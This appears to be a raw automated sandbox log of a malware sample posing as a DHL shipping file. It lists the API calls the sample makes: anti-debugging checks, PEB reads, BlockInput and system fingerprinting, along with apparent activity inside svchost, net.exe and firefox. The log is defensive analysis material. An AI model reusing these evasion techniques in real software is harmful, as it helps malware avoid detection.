Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00559B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00559B2B
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_0054DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0054DBBE
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00555C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00555C97
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_004BC980 FindFirstFileW,FindNextFileW,FindClose,	5_2_004BC980

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_004E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004E42DE

Source: gdWgEHryJDTaS.exe, 00000008.00000002.3506215724.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: net.exe, 00000005.00000002.3505635674.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
Source: firefox.exe, 00000009.00000002.2209658947.000001F56BDCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03A7096E rdtsc

1_2_03A7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417E73 LdrLoadDll,

1_2_00417E73

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_0055EAA2 BlockInput,

0_2_0055EAA2

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_00512622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00512622

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_004E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004E42DE

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_00504CE8 mov eax, dword ptr fs:[00000030h]	0_2_00504CE8
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_033E3518 mov eax, dword ptr fs:[00000030h]	0_2_033E3518
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_033E34B8 mov eax, dword ptr fs:[00000030h]	0_2_033E34B8
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe	Code function: 0_2_033E1EB8 mov eax, dword ptr fs:[00000030h]	0_2_033E1EB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]	1_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]	1_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]	1_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5438F mov eax, dword ptr fs:[00000030h]	1_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A5438F mov eax, dword ptr fs:[00000030h]	1_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]	1_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]	1_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]	1_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]	1_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A663FF mov eax, dword ptr fs:[00000030h]	1_2_03A663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEC3CD mov eax, dword ptr fs:[00000030h]	1_2_03AEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]	1_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]	1_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]	1_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]	1_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB63C0 mov eax, dword ptr fs:[00000030h]	1_2_03AB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	1_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	1_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]	1_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]	1_2_03ADE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	1_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	1_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B08324 mov eax, dword ptr fs:[00000030h]	1_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B08324 mov ecx, dword ptr fs:[00000030h]	1_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B08324 mov eax, dword ptr fs:[00000030h]	1_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B08324 mov eax, dword ptr fs:[00000030h]	1_2_03B08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]	1_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]	1_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]	1_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2C310 mov ecx, dword ptr fs:[00000030h]	1_2_03A2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A50310 mov ecx, dword ptr fs:[00000030h]	1_2_03A50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD437C mov eax, dword ptr fs:[00000030h]	1_2_03AD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]	1_2_03AB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]	1_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]	1_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]	1_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB035C mov ecx, dword ptr fs:[00000030h]	1_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]	1_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]	1_2_03AB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AFA352 mov eax, dword ptr fs:[00000030h]	1_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD8350 mov ecx, dword ptr fs:[00000030h]	1_2_03AD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B0634F mov eax, dword ptr fs:[00000030h]	1_2_03B0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A402A0 mov eax, dword ptr fs:[00000030h]	1_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A402A0 mov eax, dword ptr fs:[00000030h]	1_2_03A402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]	1_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03AC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E284 mov eax, dword ptr fs:[00000030h]	1_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A6E284 mov eax, dword ptr fs:[00000030h]	1_2_03A6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]	1_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]	1_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]	1_2_03AB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]	1_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]	1_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]	1_2_03A402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03A3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B062D6 mov eax, dword ptr fs:[00000030h]	1_2_03B062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2823B mov eax, dword ptr fs:[00000030h]	1_2_03A2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]	1_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]	1_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]	1_2_03A34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2826B mov eax, dword ptr fs:[00000030h]	1_2_03A2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]	1_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB8243 mov eax, dword ptr fs:[00000030h]	1_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB8243 mov ecx, dword ptr fs:[00000030h]	1_2_03AB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B0625D mov eax, dword ptr fs:[00000030h]	1_2_03B0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2A250 mov eax, dword ptr fs:[00000030h]	1_2_03A2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36259 mov eax, dword ptr fs:[00000030h]	1_2_03A36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEA250 mov eax, dword ptr fs:[00000030h]	1_2_03AEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEA250 mov eax, dword ptr fs:[00000030h]	1_2_03AEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A70185 mov eax, dword ptr fs:[00000030h]	1_2_03A70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEC188 mov eax, dword ptr fs:[00000030h]	1_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AEC188 mov eax, dword ptr fs:[00000030h]	1_2_03AEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD4180 mov eax, dword ptr fs:[00000030h]	1_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD4180 mov eax, dword ptr fs:[00000030h]	1_2_03AD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]	1_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]	1_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]	1_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]	1_2_03AB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]	1_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]	1_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]	1_2_03A2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B061E5 mov eax, dword ptr fs:[00000030h]	1_2_03B061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A601F8 mov eax, dword ptr fs:[00000030h]	1_2_03A601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	1_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF61C3 mov eax, dword ptr fs:[00000030h]	1_2_03AF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03AAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A60124 mov eax, dword ptr fs:[00000030h]	1_2_03A60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov eax, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADE10E mov ecx, dword ptr fs:[00000030h]	1_2_03ADE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADA118 mov ecx, dword ptr fs:[00000030h]	1_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]	1_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]	1_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]	1_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF0115 mov eax, dword ptr fs:[00000030h]	1_2_03AF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04164 mov eax, dword ptr fs:[00000030h]	1_2_03B04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B04164 mov eax, dword ptr fs:[00000030h]	1_2_03B04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]	1_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]	1_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC4144 mov ecx, dword ptr fs:[00000030h]	1_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]	1_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]	1_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2C156 mov eax, dword ptr fs:[00000030h]	1_2_03A2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC8158 mov eax, dword ptr fs:[00000030h]	1_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36154 mov eax, dword ptr fs:[00000030h]	1_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A36154 mov eax, dword ptr fs:[00000030h]	1_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A280A0 mov eax, dword ptr fs:[00000030h]	1_2_03A280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC80A8 mov eax, dword ptr fs:[00000030h]	1_2_03AC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF60B8 mov eax, dword ptr fs:[00000030h]	1_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]	1_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A3208A mov eax, dword ptr fs:[00000030h]	1_2_03A3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_03A2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A380E9 mov eax, dword ptr fs:[00000030h]	1_2_03A380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB60E0 mov eax, dword ptr fs:[00000030h]	1_2_03AB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]	1_2_03A2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A720F0 mov ecx, dword ptr fs:[00000030h]	1_2_03A720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB20DE mov eax, dword ptr fs:[00000030h]	1_2_03AB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2A020 mov eax, dword ptr fs:[00000030h]	1_2_03A2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A2C020 mov eax, dword ptr fs:[00000030h]	1_2_03A2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AC6030 mov eax, dword ptr fs:[00000030h]	1_2_03AC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AB4000 mov ecx, dword ptr fs:[00000030h]	1_2_03AB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03AD2000 mov eax, dword ptr fs:[00000030h]	1_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]	1_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]	1_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]	1_2_03A4E016
